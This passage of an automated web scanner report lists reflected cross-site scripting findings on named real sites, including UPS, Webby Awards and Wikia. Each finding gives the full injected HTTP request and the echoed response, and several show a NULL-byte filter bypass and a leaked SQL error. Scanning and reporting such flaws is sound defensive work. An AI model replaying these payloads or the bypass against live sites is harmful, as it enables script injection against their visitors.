Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/createb0e15"%20a%3db%2027a12099018 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42328

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis/createb0e15" a=b 27a12099018?appid=UIS">
...[SNIP]...

1.474. https://www.ups.com/uis/create [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1254a'%3bae2686a7b9a was submitted in the REST URL parameter 2. This input was echoed as 1254a';ae2686a7b9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create1254a'%3bae2686a7b9a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
9a?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
actionUrl = "/one-to-one/login
...[SNIP]...

1.475. https://www.ups.com/uis/create [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008760f</script><script>alert(1)</script>e6835d0adba was submitted in the loc parameter. This input was echoed as 8760f</script><script>alert(1)</script>e6835d0adba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create?loc=en_US%008760f</script><script>alert(1)</script>e6835d0adba&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10986







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f</script><script>alert(1)</script>e6835d0adba&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f
...[SNIP]...

1.476. https://www.ups.com/uis/create [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001b991'-alert(1)-'d321cced5f0 was submitted in the loc parameter. This input was echoed as 1b991'-alert(1)-'d321cced5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create?loc=en_US%001b991'-alert(1)-'d321cced5f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10310







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
ed5f0&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
actionUrl = "/one-to-on
...[SNIP]...

1.477. https://www.ups.com/uis/create [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00796b6"><script>alert(1)</script>b4cf012dbf6 was submitted in the loc parameter. This input was echoed as 796b6"><script>alert(1)</script>b4cf012dbf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create?loc=en_US%00796b6"><script>alert(1)</script>b4cf012dbf6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10886







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_796b6"><script>alert(1)</script>b4cf012dbf6&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_796b6%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb4cf012dbf6%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.478. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webbyawards.com
Path:	/webbys/current_honorees.php

Issue detail

The value of the media_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e24"><script>alert(1)</script>346d75171f8 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webbys/current_honorees.php?media_id=96f9e24"><script>alert(1)</script>346d75171f8&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:49 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=5fff8524ae22c0822fbc5b51180eb842; expires=Mon, 21-Feb-2011 01:24:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="media_id" value="96f9e24"><script>alert(1)</script>346d75171f8">
...[SNIP]...

1.479. http://www.webbyawards.com/webbys/current_honorees.php [season parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webbyawards.com
Path:	/webbys/current_honorees.php

Issue detail

The value of the season request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049771"><script>alert(1)</script>65931fe07a7 was submitted in the season parameter. This input was echoed as 49771"><script>alert(1)</script>65931fe07a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /webbys/current_honorees.php?media_id=96&category_id=61&season=13%0049771"><script>alert(1)</script>65931fe07a7 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:53 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=4dcb5dc8d0991f164ae99145ff045147; expires=Mon, 21-Feb-2011 01:24:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a href="current_honorees.php?media_id=96&season=13.49771"><script>alert(1)</script>65931fe07a7">
...[SNIP]...

1.480. http://www.wikia.com/index.php [actionName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wikia.com
Path:	/index.php

Issue detail

The value of the actionName request parameter is copied into the HTML document as text between TITLE tags. The payload b2c83</title><script>alert(1)</script>95be19a1de3 was submitted in the actionName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?action=ajax&rs=moduleProxy&moduleName=LatestActivity&actionName=Indexb2c83</title><script>alert(1)</script>95be19a1de3&outputType=html HTTP/1.1
Host: www.wikia.com
Proxy-Connection: keep-alive
Referer: http://www.wikia.com/Wikia
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Geo={"city":"Dallas","country":"US","continent":"NA"}; varnish-stat=/server/ASH/varnish-v11-ASH/HIT/; loadtime=S1297646556.728570461,VS0,VE0; __utmz=251085184.1297646598.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LUC1=1; qcseg=%7B%22segments%22%3A%5B%7B%22id%22%3A%222495%22%7D%2C%7B%22id%22%3A%222464%22%7D%2C%7B%22id%22%3A%222462%22%7D%2C%7B%22id%22%3A%222459%22%7D%2C%7B%22id%22%3A%222457%22%7D%2C%7B%22id%22%3A%222456%22%7D%2C%7B%22id%22%3A%222453%22%7D%5D%7D; qcsegupdate=1297646595773; __qca=P0-876301846-1297646601771; OAGEO=CO%7C33%7CBogot%C3%A1%7C%7C4.6%7C-74.0833%7C%7C%7C%7C%7C; __utma=251085184.1785666727.1297646598.1297646598.1297646598.1; __utmc=251085184; __utmb=251085184.6.10.1297646598; OAID=ef5275f8036c435efa51b6a3c2ce74fc

Response

HTTP/1.1 500 Internal Server Error
Server: Varnish
Retry-After: 0
X-Selected-Backend: iowa_apache
X-Restarts: 4
Content-Length: 543
Date: Mon, 14 Feb 2011 01:28:08 GMT
Connection: close
X-Served-By: varnish-v12-ASH
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1297646887.207281351,VS0,VE1645
Set-Cookie: Geo = {"city":"Dallas","country":"US","continent":"NA"}; path=/
X-Age: 2
X-Varnish-Config: $Revision: 19021 $

<html>
<head>
<title> www.wikia.com/index.php?action=ajax&rs=moduleProxy&moduleName=LatestActivity&actionName=Indexb2c83</title><script>alert(1)</script>95be19a1de3&outputType=html</title>
<script sr
...[SNIP]...

1.481. http://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 89c97<script>alert(1)</script>2c2215b2154 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 89c97<script>alert(1)</script>2c2215b2154
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:56 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 89c97<script>alert(1)</script>2c2215b2154

1.482. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ff2ac<script>alert(1)</script>5126bbc8608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ff2ac<script>alert(1)</script>5126bbc8608
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:43:18 GMT
Expires: Mon, 14 Feb 2011 01:43:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSACDASCC=FEAHMNJDPOLIBGCEKLIDEODC; path=/
X-Powered-By: ASP.NET
Content-Length: 896
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'd7d'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = undefined, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 67d7d, @ipAddress = '173.193.214.243', @sessionId = '970794241', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=ff2ac<script>alert(1)</script>5126bbc8608', @browserName = 'Default', @browserVersion = '0.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.
...[SNIP]...

1.483. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 8ef2c<script>alert(1)</script>769ca383b77 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.138ef2c<script>alert(1)</script>769ca383b77
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:43:18 GMT
Expires: Mon, 14 Feb 2011 01:43:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=GNPLPDEACGENFEOMMGDHMFFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1595
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'd7d'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = undefined, @campaignId = 6468, @syndicationOutletId = 49160, @a
...[SNIP]...
, @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.138ef2c<script>alert(1)</script>769ca383b77', @segment = 'undefined'<br>
...[SNIP]...

1.484. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ups.com
Path:	/homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>19907ea315a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

1.485. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ups.com
Path:	/homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9602c"><script>alert(1)</script>52a22fcaf15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

1.486. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload af4ab<script>alert(1)</script>13f76ccbb09 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
